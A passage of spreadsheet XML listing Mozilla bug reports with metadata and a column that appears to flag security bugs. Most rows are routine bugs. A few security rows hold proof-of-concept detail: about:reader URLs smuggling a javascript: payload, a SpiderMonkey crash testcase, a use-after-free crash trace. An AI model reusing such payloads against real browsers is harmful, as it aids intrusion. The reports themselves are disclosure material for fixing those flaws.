        </is>
      </c>
      <c r="K3789" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L3789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3789" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3789" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3789" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3789" t="inlineStr"/>
      <c r="Q3789" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3789" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3789" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T3789" t="n">
        <v>1</v>
      </c>
      <c r="U3789" t="n">
        <v>0</v>
      </c>
      <c r="V3789" t="n">
        <v>41</v>
      </c>
      <c r="W3789" t="inlineStr">
        <is>
          <t>The about:reader page can be opened from an unprivileged context, accepting any protocol in the "url" parameter. If parsing of the target document fails, the browser will eventually redirect to the specified URL.
Therefore, this link will redirect to the XUL document without any user interaction:
about:reader?url=chrome://browser/content/browser.xul
If a javascript: link is given, the script executes when the user tries to close the reader view (navigate back to the "original page"):
about:reader?url=javascript:alert(document.location)
The JS payload then evaluates in the about:reader context (which does not have chrome privileges).</t>
        </is>
      </c>
      <c r="X3789" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3790">
      <c r="A3790" t="n">
        <v>1201793</v>
      </c>
      <c r="B3790" t="inlineStr">
        <is>
          <t>2015-09-03 22:50:37 -0700</t>
        </is>
      </c>
      <c r="C3790" t="inlineStr">
        <is>
          <t>"Assertion failure: !has(reg), at ../../../gecko/js/src/jit/RegisterSets.h:860" in B2G debug build on Z3C</t>
        </is>
      </c>
      <c r="D3790" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:19 -0700</t>
        </is>
      </c>
      <c r="E3790" t="n">
        <v>1</v>
      </c>
      <c r="F3790" t="n">
        <v>1</v>
      </c>
      <c r="G3790" t="n">
        <v>3</v>
      </c>
      <c r="H3790" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3790" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3790" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3790" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3790" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3790" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3790" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3790" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3790" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q3790" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3790" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3790" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T3790" t="n">
        <v>1</v>
      </c>
      <c r="U3790" t="n">
        <v>0</v>
      </c>
      <c r="V3790" t="n">
        <v>41</v>
      </c>
      <c r="W3790" t="inlineStr">
        <is>
          <t>I am trying to produce a debug build for my Z3C.  When I do, the homescreen app hits this assertion a couple of seconds after starting:
Assertion failure: !has(reg), at ../../../gecko/js/src/jit/RegisterSets.h:860
I followed these steps from my B2G checkout to produce the build:
$ git pull
$ rm -rf objdir-gecko out
$ repo forall -c 'git reset --hard'
$ repo forall -c 'git clean -f -d'
$ repo sync -d
$ ./config.sh aries
$ ./build.sh
$ ./flash.sh
and my .userconfig is:
export B2G_DEBUG=1
export NOFTU=1
export DEVICE_DEBUG=1</t>
        </is>
      </c>
      <c r="X3790" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3791">
      <c r="A3791" t="n">
        <v>122027</v>
      </c>
      <c r="B3791" t="inlineStr">
        <is>
          <t>2002-01-26 14:27:17 -0800</t>
        </is>
      </c>
      <c r="C3791" t="inlineStr">
        <is>
          <t>Sidebar forgets items, customize has no available tabs</t>
        </is>
      </c>
      <c r="D3791" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E3791" t="n">
        <v>1</v>
      </c>
      <c r="F3791" t="n">
        <v>1</v>
      </c>
      <c r="G3791" t="n">
        <v>2</v>
      </c>
      <c r="H3791" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3791" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3791" t="inlineStr">
        <is>
          <t>Sidebar</t>
        </is>
      </c>
      <c r="K3791" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3791" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3791" t="inlineStr">
        <is>
          <t>Windows ME</t>
        </is>
      </c>
      <c r="N3791" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3791" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3791" t="inlineStr">
        <is>
          <t>fix in hand; awaiting review</t>
        </is>
      </c>
      <c r="Q3791" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3791" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3791" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T3791" t="n">
        <v>1</v>
      </c>
      <c r="U3791" t="n">
        <v>0</v>
      </c>
      <c r="V3791" t="n">
        <v>35</v>
      </c>
      <c r="W3791" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:0.9.8+) Gecko/20020126
BuildID:    2002012608
As of the 2002-01-26 build, sidebar is badly broken.  In the first window only
two of my sidebar items appear, in all other windows the sidebar is empty.  The
Customize Sidebar window appears with no items in the Availabe Tabs or Tabs in
Sidebar sections.
Reproducible: Always
Works with 2002012503.  The Sidebar items are still there if you go back to a
previous version.</t>
        </is>
      </c>
      <c r="X3791" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3792">
      <c r="A3792" t="n">
        <v>1414094</v>
      </c>
      <c r="B3792" t="inlineStr">
        <is>
          <t>2017-11-02 16:29:34 -0700</t>
        </is>
      </c>
      <c r="C3792" t="inlineStr">
        <is>
          <t>Reduce duplication in the Travis config</t>
        </is>
      </c>
      <c r="D3792" t="inlineStr">
        <is>
          <t>2021-12-05 14:49:36 -0800</t>
        </is>
      </c>
      <c r="E3792" t="n">
        <v>1</v>
      </c>
      <c r="F3792" t="n">
        <v>1</v>
      </c>
      <c r="G3792" t="n">
        <v>7</v>
      </c>
      <c r="H3792" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3792" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3792" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3792" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3792" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3792" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3792" t="inlineStr"/>
      <c r="Q3792" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3792" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3792" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3792" t="n">
        <v>1</v>
      </c>
      <c r="U3792" t="n">
        <v>0</v>
      </c>
      <c r="V3792" t="n">
        <v>3</v>
      </c>
      <c r="W3792" t="inlineStr">
        <is>
          <t>Dave Hunt spotted the monstrosity that is our .travis.yml, which we discussed on IRC earlier. I was going to save cleaning it up until continuing with the Docker work, but let's do so now to make the Travis config easier to understand (and less distracting) for contributors in the meantime.</t>
        </is>
      </c>
      <c r="X3792" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3793">
      <c r="A3793" t="n">
        <v>330133</v>
      </c>
      <c r="B3793" t="inlineStr">
        <is>
          <t>2006-03-10 23:13:04 -0800</t>
        </is>
      </c>
      <c r="C3793" t="inlineStr">
        <is>
          <t>[FIX]Navigation keys don't work in composition</t>
        </is>
      </c>
      <c r="D3793" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E3793" t="n">
        <v>1</v>
      </c>
      <c r="F3793" t="n">
        <v>1</v>
      </c>
      <c r="G3793" t="n">
        <v>3</v>
      </c>
      <c r="H3793" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3793" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3793" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K3793" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3793" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3793" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3793" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3793" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3793" t="inlineStr"/>
      <c r="Q3793" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3793" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3793" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T3793" t="n">
        <v>1</v>
      </c>
      <c r="U3793" t="n">
        <v>0</v>
      </c>
      <c r="V3793" t="n">
        <v>7</v>
      </c>
      <c r="W3793" t="inlineStr">
        <is>
          <t>With linux seamonkey trunk 2006031010, navigation keys (arrows, page up/down, etc) don't work in mail composition (and composer).  This regressed between build 2006030909 and a CVS build pulled 20:16 the same day.  Bug 309316 looks like the most likely checkin.</t>
        </is>
      </c>
      <c r="X3793" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3794">
      <c r="A3794" t="n">
        <v>878867</v>
      </c>
      <c r="B3794" t="inlineStr">
        <is>
          <t>2013-06-03 10:13:12 -0700</t>
        </is>
      </c>
      <c r="C3794" t="inlineStr">
        <is>
          <t>auth_user and users tables have different email addresses</t>
        </is>
      </c>
      <c r="D3794" t="inlineStr">
        <is>
          <t>2014-05-05 21:15:52 -0700</t>
        </is>
      </c>
      <c r="E3794" t="n">
        <v>1</v>
      </c>
      <c r="F3794" t="n">
        <v>1</v>
      </c>
      <c r="G3794" t="n">
        <v>6</v>
      </c>
      <c r="H3794" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3794" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3794" t="inlineStr">
        <is>
          <t>Code Quality</t>
        </is>
      </c>
      <c r="K3794" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L3794" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3794" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3794" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3794" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3794" t="inlineStr">
        <is>
          <t>p=3</t>
        </is>
      </c>
      <c r="Q3794" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3794" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3794" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3794" t="n">
        <v>1</v>
      </c>
      <c r="U3794" t="n">
        <v>0</v>
      </c>
      <c r="V3794" t="n">
        <v>9</v>
      </c>
      <c r="W3794" t="inlineStr">
        <is>
          <t>select au.id, au.first_name, au.last_name, us.display_name, au.email, us.email
FROM
(select id,  first_name,  last_name, email from auth_user) AS au
JOIN
(select id, display_name, email from users) AS us ON (au.id=us.id)
WHERE au.email &lt;&gt; us.email
group by au.id; 
8490 rows in set (!)
I believe its because auth_user isn't updated, whereas users is.  Filed under Code Quality but who knows what other random bugs it causes - sentry always uses auth_user, for example.</t>
        </is>
      </c>
      <c r="X3794" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3795">
      <c r="A3795" t="n">
        <v>1241731</v>
      </c>
      <c r="B3795" t="inlineStr">
        <is>
          <t>2016-01-21 17:49:59 -0800</t>
        </is>
      </c>
      <c r="C3795" t="inlineStr">
        <is>
          <t>Assertion failure: tag &gt;= SCTAG_TRANSFER_MAP_PENDING_ENTRY, at js/src/vm/StructuredClone.cpp:429 with OOM</t>
        </is>
      </c>
      <c r="D3795" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:05 -0700</t>
        </is>
      </c>
      <c r="E3795" t="n">
        <v>1</v>
      </c>
      <c r="F3795" t="n">
        <v>1</v>
      </c>
      <c r="G3795" t="n">
        <v>3</v>
      </c>
      <c r="H3795" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3795" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3795" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3795" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3795" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3795" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3795" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3795" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3795" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main45+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q3795" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3795" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3795" t="inlineStr">
        <is>
          <t>mozilla47</t>
        </is>
      </c>
      <c r="T3795" t="n">
        <v>1</v>
      </c>
      <c r="U3795" t="n">
        <v>0</v>
      </c>
      <c r="V3795" t="n">
        <v>30</v>
      </c>
      <c r="W3795" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 6764bc656c1d (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-offthread-compile=off --ion-extra-checks):
switch (0) {
    default: oomTest(() =&gt; serialize(0, [schedulegc]))
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x087a0d40 in DiscardTransferables (buffer=&lt;optimized out&gt;, nbytes=&lt;optimized out&gt;, cb=0x0, cbClosure=0x0) at js/src/vm/StructuredClone.cpp:429
#0  0x087a0d40 in DiscardTransferables (buffer=&lt;optimized out&gt;, nbytes=&lt;optimized out&gt;, cb=0x0, cbClosure=0x0) at js/src/vm/StructuredClone.cpp:429
#1  0x087a79da in JSStructuredCloneWriter::~JSStructuredCloneWriter (this=0xffffb590, __in_chrg=&lt;optimized out&gt;) at js/src/vm/StructuredClone.cpp:749
#2  0x087d49a8 in WriteStructuredClone (cx=cx@entry=0xf7a7b020, v=v@entry=..., bufp=bufp@entry=0xffffb888, nbytesp=nbytesp@entry=0xffffb88c, cb=cb@entry=0x0, cbClosure=cbClosure@entry=0x0, transferable=...) at js/src/vm/StructuredClone.cpp:390
#3  0x087d4aeb in JS_WriteStructuredClone (cx=cx@entry=0xf7a7b020, value=value@entry=..., bufp=bufp@entry=0xffffb888, nbytesp=nbytesp@entry=0xffffb88c, optionalCallbacks=optionalCallbacks@entry=0x0, closure=closure@entry=0x0, transferable=transferable@entry=...) at js/src/vm/StructuredClone.cpp:2137
#4  0x087d4c50 in JSAutoStructuredCloneBuffer::write (this=this@entry=0xffffb888, cx=cx@entry=0xf7a7b020, value=..., transferable=..., optionalCallbacks=optionalCallbacks@entry=0x0, closure=closure@entry=0x0) at js/src/vm/StructuredClone.cpp:2325
#5  0x086f3f21 in Serialize (cx=0xf7a7b020, argc=2, vp=0xf57190b8) at js/src/builtin/TestingFunctions.cpp:2015
#6  0x086d231a in js::CallJSNative (cx=0xf7a7b020, native=0x86f3e90 &lt;Serialize(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
#7  0x086cebb1 in js::Invoke (cx=0xf7a7b020, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:478
#8  0x086be90a in Interpret (cx=cx@entry=0xf7a7b020, state=...) at js/src/vm/Interpreter.cpp:2802
#9  0x086ce92d in js::RunScript (cx=cx@entry=0xf7a7b020, state=...) at js/src/vm/Interpreter.cpp:425
#10 0x086cec66 in js::Invoke (cx=0xf7a7b020, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:496
#11 0x086d07d2 in js::Invoke (cx=cx@entry=0xf7a7b020, thisv=..., fval=..., argc=argc@entry=0, argv=argv@entry=0x0, rval=rval@entry=...) at js/src/vm/Interpreter.cpp:530
#12 0x08561c60 in JS_CallFunction (cx=cx@entry=0xf7a7b020, obj=..., fun=fun@entry=..., args=..., rval=rval@entry=...) at js/src/jsapi.cpp:2857
#13 0x086e6e6a in OOMTest (cx=0xf7a7b020, argc=1, vp=0xf5719060) at js/src/builtin/TestingFunctions.cpp:1218
#14 0x086d231a in js::CallJSNative (cx=0xf7a7b020, native=0x86e6b70 &lt;OOMTest(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
[...]
#26 main (argc=6, argv=0xffffcbd4, envp=0xffffcbf0) at js/src/shell/js.cpp:6985
eax	0x0	0
ebx	0x9842434	159654964
ecx	0xf7e3b88c	-136071028
edx	0x0	0
esi	0x1	1
edi	0xf7a02730	-140499152
ebp	0xffffb4a8	4294948008
esp	0xffffb450	4294947920
eip	0x87a0d40 &lt;DiscardTransferables(uint64_t*, size_t, JSStructuredCloneCallbacks const*, void*)+320&gt;
=&gt; 0x87a0d40 &lt;DiscardTransferables(uint64_t*, size_t, JSStructuredCloneCallbacks const*, void*)+320&gt;:	movl   $0x1ad,0x0
   0x87a0d4a &lt;DiscardTransferables(uint64_t*, size_t, JSStructuredCloneCallbacks const*, void*)+330&gt;:	call   0x80fe8d0 &lt;abort()&gt;</t>
        </is>
      </c>
      <c r="X3795" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3796">
      <c r="A3796" t="n">
        <v>262898</v>
      </c>
      <c r="B3796" t="inlineStr">
        <is>
          <t>2004-10-04 14:42:10 -0700</t>
        </is>
      </c>
      <c r="C3796" t="inlineStr">
        <is>
          <t>[FIX]hotmail.com - large gap between buttons and from/subject header titles</t>
        </is>
      </c>
      <c r="D3796" t="inlineStr">
        <is>
          <t>2014-04-26 03:07:15 -0700</t>
        </is>
      </c>
      <c r="E3796" t="n">
        <v>1</v>
      </c>
      <c r="F3796" t="n">
        <v>1</v>
      </c>
      <c r="G3796" t="n">
        <v>3</v>
      </c>
      <c r="H3796" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3796" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3796" t="inlineStr">
        <is>
          <t>Layout: Positioned</t>
        </is>
      </c>
      <c r="K3796" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3796" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3796" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3796" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3796" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3796" t="inlineStr"/>
      <c r="Q3796" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3796" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3796" t="inlineStr">
        <is>
          <t>mozilla1.8alpha5</t>
        </is>
      </c>
      <c r="T3796" t="n">
        <v>1</v>
      </c>
      <c r="U3796" t="n">
        <v>0</v>
      </c>
      <c r="V3796" t="n">
        <v>11</v>
      </c>
      <c r="W3796" t="inlineStr">
        <is>
          <t>In both buildID 2004100206 and 2004100406 on WinXP SP1 there is now a large gap
(about 8-10cm) between the new/delete/block etc buttons and the
from/subject/date, etc header column titles.
It was working fine in BuildID 2004093006
Steps to reproduce
1. Start Mozilla
2. Go to above URL
3. Log into hotmail account
4. Select My Messages or Mail links
Expected results
1. No large gap
Actual results
1. Large gap</t>
        </is>
      </c>
      <c r="X3796" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3797">
      <c r="A3797" t="n">
        <v>650252</v>
      </c>
      <c r="B3797" t="inlineStr">
        <is>
          <t>2011-04-15 06:42:31 -0700</t>
        </is>
      </c>
      <c r="C3797" t="inlineStr">
        <is>
          <t>Universal XSS using setTimeout</t>
        </is>
      </c>
      <c r="D3797" t="inlineStr">
        <is>
          <t>2011-11-09 15:21:22 -0800</t>
        </is>
      </c>
      <c r="E3797" t="n">
        <v>1</v>
      </c>
      <c r="F3797" t="n">
        <v>1</v>
      </c>
      <c r="G3797" t="n">
        <v>3</v>
      </c>
      <c r="H3797" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3797" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3797" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K3797" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L3797" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3797" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3797" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3797" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3797" t="inlineStr">
        <is>
          <t>[sg:high]</t>
        </is>
      </c>
      <c r="Q3797" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3797" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3797" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3797" t="n">
        <v>1</v>
      </c>
      <c r="U3797" t="n">
        <v>0</v>
      </c>
      <c r="V3797" t="n">
        <v>9</v>
      </c>
      <c r="W3797" t="inlineStr">
        <is>
          <t>By loading a target page in the middle of nsJSContext::CallEventHandler, it's
possible to perform an XSS attack.
On trunk, this is fixed by bug 614151 and bug 643450.</t>
        </is>
      </c>
      <c r="X3797" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3798">
      <c r="A3798" t="n">
        <v>351328</v>
      </c>
      <c r="B3798" t="inlineStr">
        <is>
          <t>2006-09-04 13:07:32 -0700</t>
        </is>
      </c>
      <c r="C3798" t="inlineStr">
        <is>
          <t>Crash [@ nsCSSRendering::PaintBackgroundWithSC] with colspan=0</t>
        </is>
      </c>
      <c r="D3798" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E3798" t="n">
        <v>1</v>
      </c>
      <c r="F3798" t="n">
        <v>1</v>
      </c>
      <c r="G3798" t="n">
        <v>3</v>
      </c>
      <c r="H3798" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3798" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3798" t="inlineStr">
        <is>
          <t>Layout: Tables</t>
        </is>
      </c>
      <c r="K3798" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3798" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M3798" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3798" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3798" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3798" t="inlineStr">
        <is>
          <t>[sg:critical] uses freed memory</t>
        </is>
      </c>
      <c r="Q3798" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3798" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3798" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3798" t="n">
        <v>1</v>
      </c>
      <c r="U3798" t="n">
        <v>0</v>
      </c>
      <c r="V3798" t="n">
        <v>34</v>
      </c>
      <c r="W3798" t="inlineStr">
        <is>
          <t>This testcase causes a scary crash.  In a debug build, the memory address accessed looks random (NOT something like 0xdddddddd or 0xdadadada).  Examples: 0xff9c8020, 0x653b3261.
Stack trace:
0    nsCachedStyleData::GetStyleData(nsStyleStructID const&amp;) + 92 (nsRuleNode.h:215)
1    nsStyleContext::GetStyleData(nsStyleStructID) + 52 (nsStyleContext.cpp:221)
2    nsIFrame::GetStyleData(nsStyleStructID) const + 108 (nsIFrame.h:591)
3    nsIFrame::GetStyleDisplay() const + 36 (nsStyleStructList.h:95)
4    nsCSSRendering::PaintBackgroundWithSC(nsPresContext*, nsIRenderingContext&amp;, nsIFrame*, nsRect const&amp;, nsRect const&amp;, nsStyleBackground const&amp;, nsStyleBorder const&amp;, nsStylePadding const&amp;, int, nsRect*) + 176 (nsCSSRendering.cpp:2902)
5    TableBackgroundPainter::PaintCell(nsTableCellFrame*, int) + 572 (nsTablePainter.cpp:599)
...</t>
        </is>
      </c>
      <c r="X3798" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3799">
      <c r="A3799" t="n">
        <v>989109</v>
      </c>
      <c r="B3799" t="inlineStr">
        <is>
          <t>2014-03-27 15:41:54 -0700</t>
        </is>
      </c>
      <c r="C3799" t="inlineStr">
        <is>
          <t>WebAppRT expects return values from sendMessageToJava</t>
        </is>
      </c>
      <c r="D3799" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:00 -0800</t>
        </is>
      </c>
      <c r="E3799" t="n">
        <v>1</v>
      </c>
      <c r="F3799" t="n">
        <v>1</v>
      </c>
      <c r="G3799" t="n">
        <v>6</v>
      </c>
      <c r="H3799" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3799" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J3799" t="inlineStr">
        <is>
          <t>Web Apps (PWAs)</t>
        </is>
      </c>
      <c r="K3799" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3799" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3799" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3799" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3799" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3799" t="inlineStr">
        <is>
          <t>[WebRuntime]</t>
        </is>
      </c>
      <c r="Q3799" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3799" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S3799" t="inlineStr">
        <is>
          <t>Firefox 31</t>
        </is>
      </c>
      <c r="T3799" t="n">
        <v>1</v>
      </c>
      <c r="U3799" t="n">
        <v>0</v>
      </c>
      <c r="V3799" t="n">
        <v>10</v>
      </c>
      <c r="W3799" t="inlineStr">
        <is>
          <t>I noticed this today. We don't return from this method anymore so this likely always fails.
http://mxr.mozilla.org/mozilla-central/source/mobile/android/chrome/content/WebappRT.js#72</t>
        </is>
      </c>
      <c r="X3799" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3800">
      <c r="A3800" t="n">
        <v>1380145</v>
      </c>
      <c r="B3800" t="inlineStr">
        <is>
          <t>2017-07-11 13:49:07 -0700</t>
        </is>
      </c>
      <c r="C3800" t="inlineStr">
        <is>
          <t>Document how super search fields works</t>
        </is>
      </c>
      <c r="D3800" t="inlineStr">
        <is>
          <t>2018-04-27 14:15:31 -0700</t>
        </is>
      </c>
      <c r="E3800" t="n">
        <v>1</v>
      </c>
      <c r="F3800" t="n">
        <v>1</v>
      </c>
      <c r="G3800" t="n">
        <v>4</v>
      </c>
      <c r="H3800" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3800" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J3800" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K3800" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3800" t="inlineStr">
        <is>
          <t>Unspecified</t>
